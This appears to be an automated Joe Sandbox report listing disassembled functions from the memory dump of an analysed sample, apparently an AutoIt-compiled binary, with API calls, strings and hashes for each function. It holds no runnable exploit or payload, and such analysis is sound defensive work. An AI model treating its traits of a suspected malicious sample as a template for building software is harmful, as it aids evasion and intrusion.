                                    • GetWindowLongW.USER32 ref: 008144C7
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008144D7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: 3d378be639186d76750b5c2ad218992217ffd960eeadec97973b86c5f7bf71d7
                                    • Instruction ID: ba1214880803e4777783d7f823c1d76d341c2fe048b62bb1bb197fe6975cd0e3
                                    • Opcode Fuzzy Hash: 3d378be639186d76750b5c2ad218992217ffd960eeadec97973b86c5f7bf71d7
                                    • Instruction Fuzzy Hash: D3317C71250205ABDF209E38DC45BEA7BA9FF08324F205725F979E21D0D774EC909B50
                                    Function 007E6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SysReAllocString.OLEAUT32(?,?), ref: 007E6EED
                                    • VariantCopyInd.OLEAUT32(?,?), ref: 007E6F08
                                    • VariantClear.OLEAUT32(?), ref: 007E6F12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyString
                                    • String ID: *j~
                                    • API String ID: 2173805711-3795109170
                                    • Opcode ID: 8d1b1589af57459db87abc66653a65e62beb7f205eee280d0ad8bda6325c1fc1
                                    • Instruction ID: aa70bb3b6323f5d28475091d783fa1a5adbc767d83d2f2b47ec774c2c72492c8
                                    • Opcode Fuzzy Hash: 8d1b1589af57459db87abc66653a65e62beb7f205eee280d0ad8bda6325c1fc1
                                    • Instruction Fuzzy Hash: 6F31C27160A285DFCB04BFA5E8959BD3775FFA9740B100498F8025F2A1CB389D12DBD4
                                    Function 0080304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0080335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00803077,?,?), ref: 00803378
                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0080307A
                                    • _wcslen.LIBCMT ref: 0080309B
                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00803106
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 946324512-2422070025
                                    • Opcode ID: 65e84723a6495aedd9ad203277b3bdf7d479f3012080f3bcc2d929494abddcc7
                                    • Instruction ID: b82205518d9e02d2903f130034fdaa3522e8c7e3b69f6b7f808448f6948a5e08
                                    • Opcode Fuzzy Hash: 65e84723a6495aedd9ad203277b3bdf7d479f3012080f3bcc2d929494abddcc7
                                    • Instruction Fuzzy Hash: FF31B039200205DFCB60CF68C885AAAB7E8FF55318F248059E915DB3D2DB72EE45C761
                                    Function 00813EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00813F40
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00813F54
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00813F78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: d1fad42c055195c8aae494108f7019715c5ab4617cac439c26346d261d5c5f78
                                    • Instruction ID: 14b8b31298fd1f14441ae56534cd0a9f00432eb450388e79dde8d64287f44442
                                    • Opcode Fuzzy Hash: d1fad42c055195c8aae494108f7019715c5ab4617cac439c26346d261d5c5f78
                                    • Instruction Fuzzy Hash: 1621AD32600219BBDF219E50DC46FEA3B79FF48714F110214FA15AB190DAB5A8918B90
                                    Function 00814653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00814705
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00814713
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0081471A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: aece77a1d7db5f4c285e7a9762c436995e495aecf09a9a2c9f8d2d372ba2b560
                                    • Instruction ID: 763586a92403dbc26b899cdb1ea36e8918043ab7232d2d72c016534e532ecf69
                                    • Opcode Fuzzy Hash: aece77a1d7db5f4c285e7a9762c436995e495aecf09a9a2c9f8d2d372ba2b560
                                    • Instruction Fuzzy Hash: 83218CB5600208AFEB10DF68DC85DA737ADFF5A7A8B000449FA01DB291CB34EC51CA60
                                    Function 007E95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 176396367-2734436370
                                    • Opcode ID: 7bf473efe4617168188f85106608efa3fda549e2c639866dcf6cb0520398aa60
                                    • Instruction ID: a688f5abbc85d9050afd7bda1befc0ad8e0d4ed7bb0de965426b0d5bba749597
                                    • Opcode Fuzzy Hash: 7bf473efe4617168188f85106608efa3fda549e2c639866dcf6cb0520398aa60
                                    • Instruction Fuzzy Hash: 60216B73249590A6C331AB269C06FBB73ACEF99310F104426FB59D7182EB5D9D51C391
                                    Function 008137B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00813840
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00813850
                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00813876
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: 37b2181b8b4f9aa16349e66c361463dc810563887b0f8b79da1008546428945d
                                    • Instruction ID: c45105a9e58e35e6140d140acc2c6a2095c534b4462d430653981e5a1d027074
                                    • Opcode Fuzzy Hash: 37b2181b8b4f9aa16349e66c361463dc810563887b0f8b79da1008546428945d
                                    • Instruction Fuzzy Hash: 1921A972600218BBEF219F64DC85EEB376EFF89760F108124F9149B190CA719C928BA0
                                    Function 007F49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 007F4A08
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007F4A5C
                                    • SetErrorMode.KERNEL32(00000000,?,?,0081CC08), ref: 007F4AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume
                                    • String ID: %lu
                                    • API String ID: 2507767853-685833217
                                    • Opcode ID: e6244033daf7852a5184d45691fa63e5bfdae2800c5c1ae60949ec27e55d1cbb
                                    • Instruction ID: 54e865d28060b6df44eb39b6147cd8f9d401da2ceab45cc08662a9e732d31c84
                                    • Opcode Fuzzy Hash: e6244033daf7852a5184d45691fa63e5bfdae2800c5c1ae60949ec27e55d1cbb
                                    • Instruction Fuzzy Hash: 10313E75A40109EFDB10DF64C885EAA7BF8EF09308F1480A9E909DB352D775EE45CB61
                                    Function 008141EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0081424F
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00814264
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00814271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: 67d9f3bb0139ded64526cad4f4fc87c33e03ab252502779d6c7234f99c4cac52
                                    • Instruction ID: b8d1b7d3345ab2b5f5fdec067646dddb5e414e32559b721f01c57c50bb0de24a
                                    • Opcode Fuzzy Hash: 67d9f3bb0139ded64526cad4f4fc87c33e03ab252502779d6c7234f99c4cac52
                                    • Instruction Fuzzy Hash: E511C271240248BEEF205F69CC06FEB3BADFF95B64F110524FA55E60A0D671DC919B20
                                    Function 007E2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                      • Part of subcall function 007E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 007E2DC5
                                      • Part of subcall function 007E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 007E2DD6
                                      • Part of subcall function 007E2DA7: GetCurrentThreadId.KERNEL32 ref: 007E2DDD
                                      • Part of subcall function 007E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 007E2DE4
                                    • GetFocus.USER32 ref: 007E2F78
                                      • Part of subcall function 007E2DEE: GetParent.USER32(00000000), ref: 007E2DF9
                                    • GetClassNameW.USER32(?,?,00000100), ref: 007E2FC3
                                    • EnumChildWindows.USER32(?,007E303B), ref: 007E2FEB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                    • String ID: %s%d
                                    • API String ID: 1272988791-1110647743
                                    • Opcode ID: d6c264a147720d76307e50111989ef8693bfa7e49d7866e8d1be128dd9d6acde
                                    • Instruction ID: d061b451f4237f31cf542cd8b869a117a5ea43ec464220b7ef69c289bd85f59c
                                    • Opcode Fuzzy Hash: d6c264a147720d76307e50111989ef8693bfa7e49d7866e8d1be128dd9d6acde
                                    • Instruction Fuzzy Hash: 7C1193B5700245ABCF54BF619C8DEED376EAF98314F048075BA09DB253DE3859458B60
                                    Function 00815882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008158C1
                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008158EE
                                    • DrawMenuBar.USER32(?), ref: 008158FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$InfoItem$Draw
                                    • String ID: 0
                                    • API String ID: 3227129158-4108050209
                                    • Opcode ID: 354ec4bb1e122ad41aaa2b1890f561b14ab51cdc113cc0420a4eb737634e3604
                                    • Instruction ID: 2a80e1e9192b3ce90cce054341c71131230d8552b65b57fb23e66e5a592406df
                                    • Opcode Fuzzy Hash: 354ec4bb1e122ad41aaa2b1890f561b14ab51cdc113cc0420a4eb737634e3604
                                    • Instruction Fuzzy Hash: 1F015771600218EFDB219F11EC48BEEBBB9FF85360F1080A9E849D6151DB308A84EF21
                                    Function 007DD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 007DD3BF
                                    • FreeLibrary.KERNEL32 ref: 007DD3E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AddressFreeLibraryProc
                                    • String ID: GetSystemWow64DirectoryW$X64
                                    • API String ID: 3013587201-2590602151
                                    • Opcode ID: 5dfa67f5617227a6087f158a458e495b10a253941f24d28aa9cdb43e34b13dff
                                    • Instruction ID: df57f40c3094e0155a4e8a9a4cccf9b71e92a079f079136ff482dc63f5e6943c
                                    • Opcode Fuzzy Hash: 5dfa67f5617227a6087f158a458e495b10a253941f24d28aa9cdb43e34b13dff
                                    • Instruction Fuzzy Hash: 1EF0ABB1480300EFCB7017008C18DA93338FF21701B55809BF046E2310D76CDC84CB52
                                    Function 007E007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 05622fa607ec5a31ef8ed1e6befc4529384b174694f738022b60edb8f3e55d52
                                    • Instruction ID: 42bcdb5721b3ae8005163f70cba75c400fe41076ac535fbe80bf40073a0c2136
                                    • Opcode Fuzzy Hash: 05622fa607ec5a31ef8ed1e6befc4529384b174694f738022b60edb8f3e55d52
                                    • Instruction Fuzzy Hash: 0BC18C75A0124AEFCB04CFA5C888AAEB7B9FF48314F208598E505EB251D775ED81CB90
                                    Function 0080342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInitInitializeUninitialize
                                    • String ID:
                                    • API String ID: 1998397398-0
                                    • Opcode ID: efbea913014844bc5748c016a2906a6aeb7790e1027468b259e788a268ee037d
                                    • Instruction ID: 333e779bff9e91c388b23c8c3b826683214928163778b9e0bd2d4bfe8ca935f4
                                    • Opcode Fuzzy Hash: efbea913014844bc5748c016a2906a6aeb7790e1027468b259e788a268ee037d
                                    • Instruction Fuzzy Hash: AFA13C75604200DFC754EF28C885A2AB7E9FF88714F148859F95ADB3A2DB35ED01CB51
                                    Function 007E0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0081FC08,?), ref: 007E05F0
                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0081FC08,?), ref: 007E0608
                                    • CLSIDFromProgID.OLE32(?,?,00000000,0081CC40,000000FF,?,00000000,00000800,00000000,?,0081FC08,?), ref: 007E062D
                                    • _memcmp.LIBVCRUNTIME ref: 007E064E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    • Opcode ID: e2abd0b607e069599e74bee36ce3557dae1aa6733adc2c36e088744cdfd6b839
                                    • Instruction ID: df4ed0746cb418c5078601eaa9a44ea0d7b5960c488e1f053fe559a864f2d1ed
                                    • Opcode Fuzzy Hash: e2abd0b607e069599e74bee36ce3557dae1aa6733adc2c36e088744cdfd6b839
                                    • Instruction Fuzzy Hash: 5B811971A00109EFCB04DF94C988EEEB7B9FF89315F204558E516AB250DB75AE46CBA0
                                    Function 007C1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: a37bde15f7677d6a5aedf36c538472df3a6b042169271cddff40f2537de1ccc9
                                    • Instruction ID: 9bdebc444dd6035bffdf4e100ad68e638cdf28a439294b8ebb9d96ef279c80a3
                                    • Opcode Fuzzy Hash: a37bde15f7677d6a5aedf36c538472df3a6b042169271cddff40f2537de1ccc9
                                    • Instruction Fuzzy Hash: C5411931900540EADB296BF89C49FEE3BA5EF83370F64463DF419D6293E63C8A415661
                                    Function 00816278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(010B0A20,?), ref: 008162E2
                                    • ScreenToClient.USER32(?,?), ref: 00816315
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00816382
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 44608e81c4da734299f87d9d617b1ea192132475effa6d0cf14c4f1fd3ad4482
                                    • Instruction ID: 3277251032187507cfcef176235c37c322101856bab7d968d590eb9053dd4027
                                    • Opcode Fuzzy Hash: 44608e81c4da734299f87d9d617b1ea192132475effa6d0cf14c4f1fd3ad4482
